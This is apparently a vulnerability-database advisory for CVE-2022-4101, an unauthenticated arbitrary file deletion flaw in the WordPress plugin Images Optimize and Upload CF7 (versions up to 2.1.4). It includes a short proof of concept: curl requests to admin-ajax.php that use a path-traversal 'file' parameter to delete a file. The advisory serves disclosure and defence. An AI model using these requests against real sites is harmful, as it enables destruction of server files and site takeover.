Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitCydaveWPEX-ID:2CE4C837-C62C-41AC-95CA-54BB1A6D1EEB
HistoryDec 21, 2022 - 12:00 a.m.

Images Optimize and Upload CF7 <= 2.1.4 - Unauthenticated Arbitrary File Deletion

2022-12-2100:00:00
cydave
66
wordpress
contact form 7
vulnerable plugin
file deletion
unauthenticated access
security vulnerability
data manipulation

0.002 Low

EPSS

Percentile

55.5%

JSON

The plugin does not validate the file to be deleted via an AJAX action available to unauthenticated users, which could allow them to delete arbitrary files on the server via path traversal attack.

1. Install contact-form-7 (dependency)

2. Install the vulnerable plugin (images-optimize-and-upload-cf7 version 2.1.3)

3. Invoke curl to create a potentially missing upload directory (required for the exploit to work):

curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_uploader'

4. Invoke the following curl command to delete the delete.me file at the root of the blog:

curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_delete' \
    --data 'file=../../../delete.me'

Related

wpvulndb 1
prion 1
cvelist 1
nvd 1
cve 1
wpvulndb
wpvulndb
Images Optimize and Upload CF7 <= 2.1.4 - Unauthenticated Arbitrary File Deletion
2022-12-21 00:00:00
prion
prion
Path traversal
2023-01-16 16:15:00
cvelist
cvelist
CVE-2022-4101 Images Optimize and Upload CF7 <= 2.1.4 - Unauthenticated Arbitrary File Deletion
2023-01-16 15:37:49
nvd
nvd
CVE-2022-4101
2023-01-16 16:15:11
cve
cve
CVE-2022-4101
2023-01-16 16:15:11

0.002 Low

EPSS

Percentile

55.5%

JSON
Related for WPEX-ID:2CE4C837-C62C-41AC-95CA-54BB1A6D1EEB
wpvulndb1prion1cvelist1nvd1cve1